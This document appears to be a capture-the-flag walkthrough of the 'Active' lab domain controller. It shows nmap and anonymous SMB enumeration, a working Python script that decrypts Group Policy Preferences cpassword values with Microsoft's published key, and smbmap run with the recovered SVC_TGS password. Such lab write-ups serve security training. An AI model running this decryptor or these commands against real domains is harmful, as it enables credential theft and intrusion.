Difficulty: Medium
Machine Creator: eks & mrb3n
Tools Used:
NMAP
SMBCLIENT
gpp-decrypt
smbmap
ldapsearch
GetUserSPNs.py
Hashcat
wmiexec.py
Task: To find User.txt and Root.txt
Network Enumeration
Let’s start with an NMAP scan.
nmap -sV -sC 10.10.10.100
The scan gives us plenty to work with. Port 53 is Microsoft DNS, port 88 is Kerberos, and ports 389 and 3268 are LDAP (3268 being the Global Catalog). That combination of services is the signature of a domain controller, and the scan output names the domain as active.htb, so we can expect this host to be a DC for active.htb.
SMB
SMB on port 445 is also open on this box, so let's see whether we can access any shares.
smbclient -L //10.10.10.100
smbclient //10.10.10.100/Replication
After some trial and error, I was able to access the Replication share without credentials (smbclient prompts for a password; pressing Enter gives a null session). Replication is a domain share that mirrors the contents of SYSVOL.
Browsing it, we find the "Policies" directory, which holds the domain's group policy objects. Inside one of the policy folders, under the Group Policy Preferences layout (Preferences\Groups), there is a Groups.xml file, and that file can contain some vital information.
Group Policy
Groups.xml is a Group Policy Preferences file: on older versions of Windows it let an administrator create or modify local users and groups on domain machines through group policy. In this file we can see an entry that updates the user active.htb\SVC_TGS and sets its password. The cpassword attribute is an AES-encrypted copy of that password.
CPASSWORD
https://msdn.microsoft.com/en-us/library/cc422924.aspx
The weakness of cpassword is that the AES key is not secret: Microsoft published it in the specification linked above, the same key is used in every domain, and it has never been changed. MS14-025 (May 2014) stopped the policy editor from writing new passwords this way, but any Groups.xml that already carries a cpassword stays readable by every domain user who can read SYSVOL, and the password can be recovered with the tool gpp-decrypt by passing it the cpassword value.
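To make the Group Policy and cpassword points concrete, here is an added example that walks the whole path: parse a Groups.xml for entries carrying a cpassword, then decrypt them exactly as gpp-decrypt does (base64, AES-256-CBC with the published key and a zero IV, PKCS#7 padding, UTF-16LE). This is not code from the writeup, from the box, or from gpp-decrypt. The AES key is the one Microsoft published in the GPP specification (the MSDN page linked above); the sample Groups.xml, the password used to build it, and every helper name are constructed for illustration. Parsing needs only the standard library; decryption needs the `cryptography` package.

```python
"""Pull cpassword values out of a Group Policy Preferences Groups.xml and
decrypt them the way gpp-decrypt does.

Added example for this writeup; not the box's Groups.xml and not
gpp-decrypt's own code. The AES key is the one Microsoft published in the
GPP specification (the MSDN page linked above). The sample XML, the
password used to build it and every helper name are constructed here.
"""
import base64
import xml.etree.ElementTree as ET
from typing import Dict, List

try:
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
except ImportError:  # parsing still works; gpp_decrypt will say what is missing
    Cipher = None

# The published 32-byte AES-256 key. It is identical in every domain, which is
# the whole problem: anyone who can read SYSVOL can decrypt every cpassword.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_IV = bytes(16)  # AES-CBC with an all-zero IV, per the specification


def fix_base64_padding(cpassword: str) -> str:
    """GPP writes cpassword without trailing '=' characters; restore them."""
    return cpassword + "=" * (-len(cpassword) % 4)


def _cipher():
    if Cipher is None:
        raise RuntimeError("install the 'cryptography' package to decrypt cpassword")
    return Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(GPP_IV), backend=default_backend())


def gpp_decrypt(cpassword: str) -> str:
    """base64 -> AES-256-CBC -> strip PKCS#7 -> UTF-16LE, as gpp-decrypt does."""
    ciphertext = base64.b64decode(fix_base64_padding(cpassword))
    decryptor = _cipher().decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    pad_len = padded[-1]
    if not 1 <= pad_len <= 16 or padded[-pad_len:] != bytes([pad_len]) * pad_len:
        raise ValueError("bad PKCS#7 padding: not a GPP cpassword?")
    return padded[:-pad_len].decode("utf-16-le")


def gpp_encrypt(password: str) -> str:
    """Inverse of gpp_decrypt. Only here to build a sample value; on a real
    domain the Group Policy editor is what produced the cpassword."""
    data = password.encode("utf-16-le")
    pad_len = 16 - len(data) % 16
    data += bytes([pad_len]) * pad_len
    encryptor = _cipher().encryptor()
    ciphertext = encryptor.update(data) + encryptor.finalize()
    return base64.b64encode(ciphertext).decode("ascii").rstrip("=")


# Constructed Groups.xml in the layout GPP uses; the real file lives in
# SYSVOL under Policies\<GPO GUID>\MACHINE\Preferences\Groups\Groups.xml.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="__CPASSWORD__" changeLogon="0" noChange="1" neverExpires="1"
      acctDisabled="0" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""


def sample_groups_xml(cpassword: str) -> str:
    """Return the constructed Groups.xml with the given cpassword filled in."""
    return SAMPLE_GROUPS_XML.replace("__CPASSWORD__", cpassword)


def parse_groups_xml(xml_text: str) -> List[Dict[str, str]]:
    """Return every <User> entry that carries a cpassword attribute."""
    entries = []
    for user in ET.fromstring(xml_text).iter("User"):
        props = user.find("Properties")
        if props is None or not props.get("cpassword"):
            continue
        entries.append({
            "userName": props.get("userName", ""),
            "action": props.get("action", ""),
            "cpassword": props.get("cpassword", ""),
        })
    return entries


def recover_passwords(xml_text: str) -> Dict[str, str]:
    """Map each userName in the file to its decrypted password."""
    return {e["userName"]: gpp_decrypt(e["cpassword"]) for e in parse_groups_xml(xml_text)}


if __name__ == "__main__":
    # Build a sample carrying the password this box used, then recover it again.
    xml_text = sample_groups_xml(gpp_encrypt("GPPstillStandingStrong2k18"))
    for user, password in recover_passwords(xml_text).items():
        print(f"{user}: {password}")
```

Point `parse_groups_xml` at a real Groups.xml pulled from SYSVOL (or from the Replication share here) and `recover_passwords` does the rest; the padding check in `gpp_decrypt` is what tells you that a value was not a cpassword at all rather than silently returning garbage.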
SMBMAP
With the recovered password for SVC_TGS we can check which shares that account can read or write:
smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100